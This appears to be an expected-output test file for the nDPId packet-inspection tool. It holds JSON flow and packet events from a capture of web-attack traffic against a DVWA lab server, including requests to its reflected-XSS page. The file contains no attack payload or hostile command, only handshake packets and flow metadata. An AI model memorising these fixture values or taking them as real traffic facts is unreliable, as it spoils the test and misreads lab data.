+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499346957283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8F6tAAD4GriWsEAABwKgKMsv8AFD6EcpoAAAAAKACchDvQAAAAgQFtAQCCAoBON3DAAAAAAEDAwc="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346957283,"flow_last_seen":1499346957283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346957283,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499346957283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iOxAAD4GPOSsEAABwKgKMsv+AFCTelUvAAAAAKACchDLDwAAAgQFtAQCCAoBON3DAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499346957283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy\/xzRrv9+hHKaaAScSANvwAAAgQFtAQCCAoD4q86ATjdwwEDAwc="} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499346957283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy\/7+F1DJk3pVMKAScSDJ8AAAAgQFtAQCCAoD4q86ATjdwwEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499346957284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346957284,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0F6xAAD4GriysEAABwKgKMsv8AFD6Ecppc0a7\/oAQAOWsxgAAAQEICgE43cMD4q86"} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499346957284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346957284,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iO1AAD4GPOusEAABwKgKMsv+AFCTelUw\/hdQyoAQAOVo+AAAAQEICgE43cMD4q86"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976603,"flow_last_seen":1499346976603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976603,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499346976603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Un9AAD4Gc1GsEAABwKgKMsxKAFAevqLeAAAAAKACchDe8gAAAgQFtAQCCAoBOPChAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499346976603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976603,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEoKnmxhHr6i36AScSCi1wAAAgQFtAQCCAoD4sIYATjwoQEDAwc="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499346976604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346976604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UoBAAD4Gc1isEAABwKgKMsxKAFAevqLfCp5sYoAQAOVB3wAAAQEICgE48KED4sIY"} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976603,"flow_last_seen":1499346976604,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346976604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976677,"flow_last_seen":1499346976677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976677,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1499346976677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8I8VAAD4GogusEAABwKgKMsxMAFCAL9N2AAAAAKACchBM1QAAAgQFtAQCCAoBOPCzAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1499346976677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976677,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEzfj2P1gC\/Td6AScSBEIgAAAgQFtAQCCAoD4sIqATjwswEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1499346976677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346976677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0I8ZAAD4GohKsEAABwKgKMsxMAFCAL9N3349j9oAQAOXjKAAAAQEICgE48LQD4sIq"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976999,"flow_last_seen":1499346976999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976999,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1499346976999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z5FAAD4GXj+sEAABwKgKMsxeAFDFSpaVAAAAAKACchBEOAAAAgQFtAQCCAoBOPEEAAAAAAEDAwc="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976999,"flow_last_seen":1499346976999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976999,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1499346976999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8v9RAAD4GBfysEAABwKgKMsxgAFByIk7QAAAAAKACchDfIwAAAgQFtAQCCAoBOPEEAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1499346976999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzF63DJWlxUqWlqAScSAyBwAAAgQFtAQCCAoD4sJ7ATjxBAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1499346976999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzGAmGFC+ciJO0aAScSCizgAAAgQFtAQCCAoD4sJ7ATjxBAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z5JAAD4GXkasEAABwKgKMsxeAFDFSpaWtwyVpoAQAOXRDgAAAQEICgE48QQD4sJ7"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0v9VAAD4GBgOsEAABwKgKMsxgAFByIk7RJhhQv4AQAOVB1gAAAQEICgE48QQD4sJ7"} 
+00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976677,"flow_last_seen":1499346977863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":364,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1499346977863,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/dvwa\/js\/dvwaPage.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976999,"flow_last_seen":1499346977870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1499346977870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346983175,"flow_last_seen":1499346983175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346983175,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1499346983175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346983175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ikRAAD4GO4ysEAABwKgKMsyiAFBY531IAAAAAKACchDDnAAAAgQFtAQCCAoBOPcMAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1499346983175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346983175,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzKJurEWjWOd9SaAScSBDxgAAAgQFtAQCCAoD4siDATj3DAEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1499346983176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346983176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ikVAAD4GO5OsEAABwKgKMsyiAFBY531JbqxFpIAQAOXizQAAAQEICgE49wwD4siD"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346984469,"flow_last_seen":1499346984469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346984469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1499346984469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346984469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8puFAAD4GHu+sEAABwKgKMsywAFBLrV6uAAAAAKACchDuHwAAAgQFtAQCCAoBOPhPAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1499346984469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346984469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzLBWnxN3S61er6AScSC3PwAAAgQFtAQCCAoD4snGATj4TwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1499346984470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346984470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0puJAAD4GHvasEAABwKgKMsywAFBLrV6vVp8TeIAQAOVWRgAAAQEICgE4+FAD4snG"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346985762,"flow_last_seen":1499346985762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346985762,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1499346985762,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346985762,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8k7hAAD4GMhisEAABwKgKMsy+AFBA2morAAAAAKACchDsIwAAAgQFtAQCCAoBOPmTAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1499346985762,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346985762,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzL4AEHgfQNpqLKAScSCl5gAAAgQFtAQCCAoD4ssKATj5kwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1499346985762,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346985762,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0k7lAAD4GMh+sEAABwKgKMsy+AFBA2mosABB4IIAQAOVE7gAAAQEICgE4+ZMD4ssK"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346988319,"flow_last_seen":1499346988319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346988319,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1499346988319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346988319,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NptAAD4GjzWsEAABwKgKMszYAFB2NsqJAAAAAKACchBT0AAAAgQFtAQCCAoBOPwSAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1499346988319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346988319,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzNhVLB2odjbKiqAScSAQbwAAAgQFtAQCCAoD4s2JATj8EgEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1499346988319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346988319,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NpxAAD4GjzysEAABwKgKMszYAFB2NsqKVSwdqYAQAOWvdgAAAQEICgE4\/BID4s2J"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346989580,"flow_last_seen":1499346989580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346989580,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1499346989580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346989580,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HPhAAD4GqNisEAABwKgKMszmAFB8FOG1AAAAAKACchA1fQAAAgQFtAQCCAoBOP1NAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1499346989580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346989580,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzOZrnFEQfBThtqAScSCnCAAAAgQFtAQCCAoD4s7EATj9TQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1499346989581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346989581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HPlAAD4GqN+sEAABwKgKMszmAFB8FOG2a5xREYAQAOVGDwAAAQEICgE4\/U4D4s7E"} 